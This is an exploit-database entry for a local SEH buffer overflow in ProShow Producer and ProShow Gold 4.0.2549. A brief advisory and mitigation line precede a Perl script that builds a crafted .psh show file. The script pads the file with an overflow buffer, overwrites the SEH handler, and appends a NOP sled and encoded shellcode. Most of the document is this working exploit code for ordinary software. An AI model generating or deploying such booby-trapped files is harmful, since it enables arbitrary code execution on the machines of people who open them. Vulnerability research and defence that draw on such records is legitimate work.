ProShow Producer //ProShow Gold v 4.0.2549(.psh) Universal Local BOF SEH

vendor:
ProShow Producer and ProShow Gold
by:
hack4love
7.5
CVSS
HIGH
Buffer Overflow
CWE
Product Name: ProShow Producer and ProShow Gold
Affected Version From: ProShow Producer and ProShow Gold versions 4.0.2549
Affected Version To: ProShow Producer and ProShow Gold versions 4.0.2549
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown
ProShow Producer //ProShow Gold v 4.0.2549(.psh) Universal Local BOF SEH

This exploit allows an attacker to execute arbitrary code or crash the ProShow Producer and ProShow Gold versions 4.0.2549 by creating a specially crafted .psh file. The vulnerability is caused by a buffer overflow in the parsing of the file header.
Mitigation:

Update to a patched version of ProShow Producer or ProShow Gold. Do not open or download .psh files from untrusted sources.
Source
Exploit-DB raw data:

#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# ProShow Producer //ProShow Gold v 4.0.2549(.psh) Universal Local BOF SEH
##########################################################################
##http://files.photodex.com/release/psgold_40_2549.exe
##http://files.photodex.com/release/pspro_40_2549.exe
###########################################################################
##THIS EXPLOIT WORK SO GOOD FOR THE TWO PROGRAM############################
###########################################################################
##FIRST WAS BY corelanc0d3r################################################
###########################################################################
my $header="Photodex(R) ProShow(TM) Show File Version=0\n".
"proshowVersion=2549\n".
"title=Untitled ProShow 1\n".
"fileName=proshowsploit.psh\n".
"description=''\n".
"showAspect=1\n".
"showSizeX=16\n".
"showSizeY=9\n".
"loop=1\n".
"loopRestart=1\n".
"displaySizeX=704\n".
"displaySizeY=528\n".
"videoSizeX=720\n".
"videoSizeY=480\n".
"videoFrameRate=29970\n".
"videoBitRate=1120000\n".
"videoMuxBitRate=1394400\n".
"outputImageSizeX=1024\n".
"outputImageSizeY=768\n".
"outputQuality=80\n".
"toolbarEnable=1\n".
"allowQuit=1\n".
"allowPlay=1\n".
"allowTime=1\n".
"allowRestart=1\n".
"allowSave=1\n".
"allowSaveAll=1\n".
"allowPrint=1\n".
"allowPrintAll=1\n".
"allowCopy=1\n".
"allowSaver=1\n".
"allowCta=1\n".
"ctaLabel=ProShow Info\n".
"ctaURL=http://www.photodex.com/\n".
"background=1\n".
"bgOutlineColor=0\n".
"bgSizeMode=1\n".
"bgColorizeColor=8421504\n".
"waterOpacity=128\n".
"waterZoom=10000\n".
"waterColorizeColor=8421504\n".
"musicVolumeOffset=100\n".
"defaultCellVolumeOffset=100\n".
"defaultCellFadeIn=100\n".
"defaultCellFadeOut=100\n".
"defaultMusicVolumeOffset=50\n".
"defaultMusicFadeIn=100\n".
"defaultMusicFadeOut=100\n".
"maxDispWidth=800\n".
"maxDispHeight=600\n".
"maxRender=1\n".
"maxRenderWidth=800\n".
"maxRenderHeight=600\n".
"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF\n".
"makeFileLocalFolder=c:/\n".
"cells=2\n".
"cell[0].imageEnable=1\n".
"cell[0].nrOfImages=1\n".
"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg";
####################################################################################
my $bof="\x41" x 6151;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xf9\x4c\x1a\x10";####Universal ##if.dnt
my $nop="\x90" x 20;
my $sec=
"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc2".
"\xf8\x23\x02\x83\xeb\xfc\xe2\xf4\x3e\x10\x67\x02\xc2\xf8\xa8\x47".
"\xfe\x73\x5f\x07\xba\xf9\xcc\x89\x8d\xe0\xa8\x5d\xe2\xf9\xc8\x4b".
"\x49\xcc\xa8\x03\x2c\xc9\xe3\x9b\x6e\x7c\xe3\x76\xc5\x39\xe9\x0f".
"\xc3\x3a\xc8\xf6\xf9\xac\x07\x06\xb7\x1d\xa8\x5d\xe6\xf9\xc8\x64".
"\x49\xf4\x68\x89\x9d\xe4\x22\xe9\x49\xe4\xa8\x03\x29\x71\x7f\x26".
"\xc6\x3b\x12\xc2\xa6\x73\x63\x32\x47\x38\x5b\x0e\x49\xb8\x2f\x89".
"\xb2\xe4\x8e\x89\xaa\xf0\xc8\x0b\x49\x78\x93\x02\xc2\xf8\xa8\x6a".
"\xfe\xa7\x12\xf4\xa2\xae\xaa\xfa\x41\x38\x58\x52\xaa\x08\xa9\x06".
"\x9d\x90\xbb\xfc\x48\xf6\x74\xfd\x25\x9b\x42\x6e\xa1\xf8\x23\x02";
###############################################################################
my $header2 = "\ncell[0].images[0].imageEnable=1\n".
"cell[0].images[0].name=Abstract_02\n".
"cell[0].images[0].replaceableTemplate=1\n".
"cell[0].images[0].sizeMode=1\n".
"cell[0].images[0].colorizeColor=8421504\n".
"cell[0].images[0].colorizeStrength=10000\n".
"cell[0].images[0].outlineColor=16777215\n".
"cell[0].images[0].aspectX=4\n".
"cell[0].images[0].aspectY=3\n".
"cell[0].images[0].videoVolume=100\n".
"cell[0].images[0].objectId=1\n".
"cell[0].images[0].videoSpeed=100\n".
"cell[0].images[0].nrOfKeyframes=2\n".
"cell[0].images[0].keyframes[0].timeSegment=1\n".
"cell[0].images[0].keyframes[0].attributeMask=-1\n".
"cell[0].images[0].keyframes[0].zoomX=10000\n".
"cell[0].images[0].keyframes[0].zoomY=10000\n".
"cell[0].images[0].keyframes[0].panAccelType=1\n".
"cell[0].images[0].keyframes[0].zoomXAccelType=1\n".
"cell[0].images[0].keyframes[0].zoomYAccelType=1\n".
"cell[0].images[0].keyframes[0].rotationAccelType=1\n".
"cell[0].images[0].keyframes[0].motionSmoothness=-1\n".
"cell[0].images[0].keyframes[0].lockAR=1\n".
"cell[0].images[0].keyframes[0].transparency=0\n".
"cell[0].images[0].keyframes[0].colorizeColor=8421504\n".
"cell[0].images[0].keyframes[0].colorizeStrength=10000\n".
"cell[0].images[0].keyframes[0].shadowOffsetX=70\n".
"cell[0].images[0].keyframes[0].shadowOffsetY=70\n".
"cell[0].images[0].keyframes[1].timestamp=10000\n".
"cell[0].images[0].keyframes[1].timeSegment=3\n".
"cell[0].images[0].keyframes[1].segmentTimestamp=10000\n".
"cell[0].images[0].keyframes[1].attributeMask=-1\n".
"cell[0].images[0].keyframes[1].zoomX=10000\n".
"cell[0].images[0].keyframes[1].zoomY=10000\n".
"cell[0].images[0].keyframes[1].panAccelType=1\n".
"cell[0].images[0].keyframes[1].zoomXAccelType=1\n".
"cell[0].images[0].keyframes[1].zoomYAccelType=1\n".
"cell[0].images[0].keyframes[1].rotationAccelType=1\n".
"cell[0].images[0].keyframes[1].motionSmoothness=-1\n".
"cell[0].images[0].keyframes[1].lockAR=1\n".
"cell[0].images[0].keyframes[1].transparency=0\n".
"cell[0].images[0].keyframes[1].colorizeColor=8421504\n".
"cell[0].images[0].keyframes[1].colorizeStrength=10000\n".
"cell[0].images[0].keyframes[1].shadowOffsetX=70\n".
"cell[0].images[0].keyframes[1].shadowOffsetY=70\n".
"cell[0].background=1\n".
"cell[0].bgDefault=1\n".
"cell[0].bgSizeMode=1\n".
"cell[0].bgColorizeColor=8421504\n".
"cell[0].sound.useDefault=1\n".
"cell[0].sound.volume=100\n".
"cell[0].sound.fadeIn=100\n".
"cell[0].sound.fadeOut=100\n".
"cell[0].sound.async=1\n".
"cell[0].sound.musicUseDefault=1\n".
"cell[0].sound.musicVolume=50\n".
"cell[0].sound.musicFadeIn=100\n".
"cell[0].sound.musicFadeOut=100\n".
"cell[0].musicVolumeOffset=50\n".
"cell[0].time=3000\n".
"cell[0].transId=2\n".
"cell[0].transTime=3000\n".
"cell[0].includeGlobalCaptions=1\n".
"cell[1].imageEnable=1\n".
"cell[1].nrOfImages=1\n".
"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpg\n".
"cell[1].images[0].imageEnable=1\n".
"cell[1].images[0].name=Abstract_01\n".
"cell[1].images[0].replaceableTemplate=1\n".
"cell[1].images[0].sizeMode=1\n".
"cell[1].images[0].colorizeColor=8421504\n".
"cell[1].images[0].colorizeStrength=10000\n".
"cell[1].images[0].outlineColor=16777215\n".
"cell[1].images[0].aspectX=4\n".
"cell[1].images[0].aspectY=3\n".
"cell[1].images[0].videoVolume=100\n".
"cell[1].images[0].objectId=2\n".
"cell[1].images[0].videoSpeed=100\n".
"cell[1].images[0].nrOfKeyframes=2\n".
"cell[1].images[0].keyframes[0].timeSegment=1\n".
"cell[1].images[0].keyframes[0].attributeMask=-1\n".
"cell[1].images[0].keyframes[0].zoomX=10000\n".
"cell[1].images[0].keyframes[0].zoomY=10000\n".
"cell[1].images[0].keyframes[0].panAccelType=1\n".
"cell[1].images[0].keyframes[0].zoomXAccelType=1\n".
"cell[1].images[0].keyframes[0].zoomYAccelType=1\n".
"cell[1].images[0].keyframes[0].rotationAccelType=1\n".
"cell[1].images[0].keyframes[0].motionSmoothness=-1\n".
"cell[1].images[0].keyframes[0].lockAR=1\n".
"cell[1].images[0].keyframes[0].transparency=0\n".
"cell[1].images[0].keyframes[0].colorizeColor=8421504\n".
"cell[1].images[0].keyframes[0].colorizeStrength=10000\n".
"cell[1].images[0].keyframes[0].shadowOffsetX=70\n".
"cell[1].images[0].keyframes[0].shadowOffsetY=70\n".
"cell[1].images[0].keyframes[1].timestamp=10000\n".
"cell[1].images[0].keyframes[1].timeSegment=3\n".
"cell[1].images[0].keyframes[1].segmentTimestamp=10000\n".
"cell[1].images[0].keyframes[1].attributeMask=-1\n".
"cell[1].images[0].keyframes[1].zoomX=10000\n".
"cell[1].images[0].keyframes[1].zoomY=10000\n".
"cell[1].images[0].keyframes[1].panAccelType=1\n".
"cell[1].images[0].keyframes[1].zoomXAccelType=1\n".
"cell[1].images[0].keyframes[1].zoomYAccelType=1\n".
"cell[1].images[0].keyframes[1].rotationAccelType=1\n".
"cell[1].images[0].keyframes[1].motionSmoothness=-1\n".
"cell[1].images[0].keyframes[1].lockAR=1\n".
"cell[1].images[0].keyframes[1].transparency=0\n".
"cell[1].images[0].keyframes[1].colorizeColor=8421504\n".
"cell[1].images[0].keyframes[1].colorizeStrength=10000\n".
"cell[1].images[0].keyframes[1].shadowOffsetX=70\n".
"cell[1].images[0].keyframes[1].shadowOffsetY=70\n".
"cell[1].background=1\n".
"cell[1].bgDefault=1\n".
"cell[1].bgSizeMode=1\n".
"cell[1].bgColorizeColor=8421504\n".
"cell[1].sound.useDefault=1\n".
"cell[1].sound.volume=100\n".
"cell[1].sound.fadeIn=100\n".
"cell[1].sound.fadeOut=100\n".
"cell[1].sound.async=1\n".
"cell[1].sound.musicUseDefault=1\n".
"cell[1].sound.musicVolume=50\n".
"cell[1].sound.musicFadeIn=100\n".
"cell[1].sound.musicFadeOut=100\n".
"cell[1].musicVolumeOffset=50\n".
"cell[1].time=3000\n".
"cell[1].transId=2\n".
"cell[1].transTime=3000\n".
"cell[1].includeGlobalCaptions=1\n".
"modifierCount=0\n";
print $header.$bof.$nsh.$seh.$nop.$sec.$header2;
################################################################################
###################################################################
open(myfile,'>> HACK4LOVE.psh');
print myfile $header.$bof.$nsh.$seh.$nop.$sec.$header2;
##################################################################

# milw0rm.com [2009-08-25]